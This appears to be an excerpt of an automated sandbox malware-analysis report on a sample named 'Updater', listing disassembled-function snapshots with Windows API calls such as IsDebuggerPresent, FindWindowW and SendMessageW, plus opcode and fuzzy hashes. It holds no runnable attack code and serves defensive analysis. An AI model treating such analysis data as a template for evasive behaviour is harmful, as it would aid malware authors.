                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                    • Opcode ID: 0fc570f346edb1c1aa61536a0066a96efb4653db9fb5ef96055c4b38df49f54d
                                                                                                                                                    • Instruction ID: 9832f9c13a4528251f0085a9c7003d61b3d34be922ad1386152e684ce2395d17
                                                                                                                                                    • Opcode Fuzzy Hash: 0fc570f346edb1c1aa61536a0066a96efb4653db9fb5ef96055c4b38df49f54d
                                                                                                                                                    • Instruction Fuzzy Hash: 4001B575A4112AAB8B14FBA4CC558FE77F9EF56360B000AA9B866573E1EB315808C760
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59
                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B82D6C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                    • Opcode ID: 3d4e92e22ba6d2a566e530421ea5f4582a853209d87492ffbf1679403de3234a
                                                                                                                                                    • Instruction ID: f5725336a8822b3137ef8d70991714c954dd5ad2938d741acbda65c7470c5624
                                                                                                                                                    • Opcode Fuzzy Hash: 3d4e92e22ba6d2a566e530421ea5f4582a853209d87492ffbf1679403de3234a
                                                                                                                                                    • Instruction Fuzzy Hash: F501F775A4110AABCB14F7A0C956AFE7BF9DF16340F1001B57806632A1EB245E08C3B1
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59
                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B82DEF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                    • Opcode ID: 52a8d969794ed85de57a757b7f9c5ebcb50316772b19382c8ddabccd25e13c4f
                                                                                                                                                    • Instruction ID: 355082b67ec70801ad7482e132683691632e52914821a2a5890e9ef1da50feaa
                                                                                                                                                    • Opcode Fuzzy Hash: 52a8d969794ed85de57a757b7f9c5ebcb50316772b19382c8ddabccd25e13c4f
                                                                                                                                                    • Instruction Fuzzy Hash: A701D1B5A4111A6BCF10FBA4C956AFEBBFDDB16340F1005B5BC06732A2EA254E08D371
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                    • String ID: 3, 3, 15, 1
                                                                                                                                                    • API String ID: 176396367-2815819253
                                                                                                                                                    • Opcode ID: 6ba9016614c30bc4172d0c90f2c53f6d2602c1d0655ef550afdac5feaead6829
                                                                                                                                                    • Instruction ID: 4df6ae7379f5100fbc92961bc8a23c17970bcb4fabe1f3c61094c8148ffe9e02
                                                                                                                                                    • Opcode Fuzzy Hash: 6ba9016614c30bc4172d0c90f2c53f6d2602c1d0655ef550afdac5feaead6829
                                                                                                                                                    • Instruction Fuzzy Hash: 8FF0C21990169895EBB09A61DDC9B7D23E4BF88700F2084E9E809C3150FB648EA5EB40
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B3FF7F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B41340,?,?,?,00B2100A), ref: 00B3FF84
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00B2100A), ref: 00B41344
                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B2100A), ref: 00B41353
                                                                                                                                                    Strings
                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B4134E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                    • Opcode ID: 6a21b73ff3e99c21ad8bfde6400b3eb322c1c1a3e1384f34e546570a750b5cb0
                                                                                                                                                    • Instruction ID: d41ff18cb23df24e9d2bc49c4ef5bbfd8e510b154867d13c1065f4afcb0294e8
                                                                                                                                                    • Opcode Fuzzy Hash: 6a21b73ff3e99c21ad8bfde6400b3eb322c1c1a3e1384f34e546570a750b5cb0
                                                                                                                                                    • Instruction Fuzzy Hash: 58E06D71A003519FD720AF2CE404746BBE4AB00744F048DACE886C3651EBB4E584CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BB2C90
                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00BB2C97
                                                                                                                                                      • Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: c50124438c02175d4a6690fa0a2b96eeff5e34a89620905d0afc3d435719b76b
                                                                                                                                                    • Instruction ID: 253753febf50b7a763201dbc5ae027fb5c71ff9175fcf1f1054940f3fb2bc588
                                                                                                                                                    • Opcode Fuzzy Hash: c50124438c02175d4a6690fa0a2b96eeff5e34a89620905d0afc3d435719b76b
                                                                                                                                                    • Instruction Fuzzy Hash: 74D0C9323C4352ABF664B7709D0BFD76A94AB24B14F1009B57646AA1E0DDE8A800C654
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BB2C50
                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BB2C63
                                                                                                                                                      • Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 0050da98aede59a546f8ef49420c7b74490b2b332978e01f909dd2719c8097de
                                                                                                                                                    • Instruction ID: 48b857273b77f7407adfa3ef7f74fae5a62cec57d35f280b43f257b291fd9a4c
                                                                                                                                                    • Opcode Fuzzy Hash: 0050da98aede59a546f8ef49420c7b74490b2b332978e01f909dd2719c8097de
                                                                                                                                                    • Instruction Fuzzy Hash: E8D0C936388352ABF664B7709D0BFE76A94AB24B14F1009B5764AAA1E0DDE8A800C654